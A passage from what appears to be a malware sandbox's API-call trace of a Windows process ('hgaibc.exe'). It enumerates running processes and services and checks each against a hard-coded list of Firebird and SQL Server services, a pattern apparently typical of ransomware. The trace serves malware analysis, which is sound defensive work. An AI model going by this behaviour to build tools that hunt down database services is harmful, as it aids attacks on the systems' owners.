(lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0190.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0190.715] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0190.715] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0190.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0190.715] lstrlenW (lpString="SENS") returned 4 [0190.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0190.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0190.715] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0190.715] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0190.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0190.715] lstrlenW (lpString="ShellHWDetection") returned 16 [0190.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0190.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0190.715] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0190.715] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0190.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0190.715] lstrlenW (lpString="Spooler") returned 7 [0190.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0190.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0190.715] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0190.715] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0190.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0190.715] lstrlenW (lpString="StateRepository") returned 15 [0190.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0190.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0190.715] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0190.715] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0190.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0190.716] lstrlenW (lpString="SysMain") returned 7 [0190.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0190.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0190.716] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0190.716] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0190.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0190.716] lstrlenW (lpString="SystemEventsBroker") returned 18 [0190.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0190.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0190.716] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0190.716] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0190.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0190.716] lstrlenW (lpString="Themes") returned 6 [0190.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0190.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0190.716] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0190.716] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0190.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0190.751] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0190.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0190.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0190.751] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0190.751] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0190.751] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x368 [0190.754] Process32FirstW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.755] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0190.756] lstrlenW (lpString="System") returned 6 [0190.756] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0190.757] lstrlenW (lpString="smss.exe") returned 8 [0190.757] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.758] lstrlenW (lpString="csrss.exe") returned 9 [0190.758] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0190.760] lstrlenW (lpString="wininit.exe") returned 11 [0190.760] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.761] lstrlenW (lpString="csrss.exe") returned 9 [0190.761] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0190.762] lstrlenW (lpString="winlogon.exe") returned 12 [0190.762] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0190.762] lstrlenW (lpString="services.exe") returned 12 [0190.763] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0190.763] lstrlenW (lpString="lsass.exe") returned 9 [0190.763] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0190.764] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0190.764] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0190.765] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0190.765] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.766] lstrlenW (lpString="svchost.exe") returned 11 [0190.766] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.767] lstrlenW (lpString="svchost.exe") returned 11 [0190.768] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0190.768] lstrlenW (lpString="dwm.exe") returned 7 [0190.768] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.769] lstrlenW (lpString="svchost.exe") returned 11 [0190.769] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.770] lstrlenW (lpString="svchost.exe") returned 11 [0190.770] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.771] lstrlenW (lpString="svchost.exe") returned 11 [0190.771] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.772] lstrlenW (lpString="svchost.exe") returned 11 [0190.772] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.772] lstrlenW (lpString="svchost.exe") returned 11 [0190.772] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.773] lstrlenW (lpString="svchost.exe") returned 11 [0190.773] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.774] lstrlenW (lpString="svchost.exe") returned 11 [0190.774] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.775] lstrlenW (lpString="svchost.exe") returned 11 [0190.775] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.776] lstrlenW (lpString="svchost.exe") returned 11 [0190.776] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.777] lstrlenW (lpString="svchost.exe") returned 11 [0190.777] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0190.778] lstrlenW (lpString="spoolsv.exe") returned 11 [0190.778] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.779] lstrlenW (lpString="svchost.exe") returned 11 [0190.779] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0190.780] lstrlenW (lpString="audiodg.exe") returned 11 [0190.780] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0190.781] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0190.781] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0190.783] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0190.783] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0190.784] lstrlenW (lpString="Memory Compression") returned 18 [0190.784] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0190.785] lstrlenW (lpString="sihost.exe") returned 10 [0190.785] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.786] lstrlenW (lpString="svchost.exe") returned 11 [0190.786] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0190.787] lstrlenW (lpString="msoia.exe") returned 9 [0190.787] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0190.788] lstrlenW (lpString="taskhostw.exe") returned 13 [0190.788] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.789] lstrlenW (lpString="explorer.exe") returned 12 [0190.789] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0190.790] lstrlenW (lpString="SearchUI.exe") returned 12 [0190.790] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0190.790] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0190.790] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0190.791] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0190.791] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.792] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0190.792] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0190.793] lstrlenW (lpString="hgaibc.exe") returned 10 [0190.793] Process32NextW (in: hSnapshot=0x368, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0190.793] CloseHandle (hObject=0x368) returned 1 [0190.794] Sleep (dwMilliseconds=0x1f4) [0191.297] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bee58 [0191.298] EnumServicesStatusExW (in: hSCManager=0x6bee58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0191.298] GetLastError () returned 0xea [0191.298] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d87a0 [0191.298] EnumServicesStatusExW (in: hSCManager=0x6bee58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d87a0, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d87a0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0191.299] CloseServiceHandle (hSCObject=0x6bee58) returned 1 [0191.299] lstrlenW (lpString="Appinfo") returned 7 [0191.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0191.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0191.299] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0191.300] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0191.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0191.300] lstrlenW (lpString="AppXSvc") returned 7 [0191.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0191.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0191.300] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0191.300] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0191.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0191.300] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0191.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0191.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0191.300] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0191.300] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0191.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0191.300] lstrlenW (lpString="Audiosrv") returned 8 [0191.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0191.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0191.300] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0191.300] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0191.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0191.300] lstrlenW (lpString="BFE") returned 3 [0191.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0191.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0191.300] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0191.300] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0191.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0191.300] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0191.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0191.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0191.301] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0191.301] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0191.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0191.301] lstrlenW (lpString="CDPSvc") returned 6 [0191.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0191.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0191.301] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0191.301] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0191.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0191.301] lstrlenW (lpString="ClickToRunSvc") returned 13 [0191.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0191.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0191.301] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0191.301] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0191.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0191.301] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0191.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0191.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0191.301] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0191.301] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0191.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0191.301] lstrlenW (lpString="CryptSvc") returned 8 [0191.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0191.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0191.301] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0191.301] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0191.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0191.301] lstrlenW (lpString="DcomLaunch") returned 10 [0191.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0191.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0191.302] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0191.302] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0191.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0191.302] lstrlenW (lpString="DeviceAssociationService") returned 24 [0191.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0191.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0191.302] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0191.302] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0191.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0191.302] lstrlenW (lpString="Dhcp") returned 4 [0191.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0191.302] 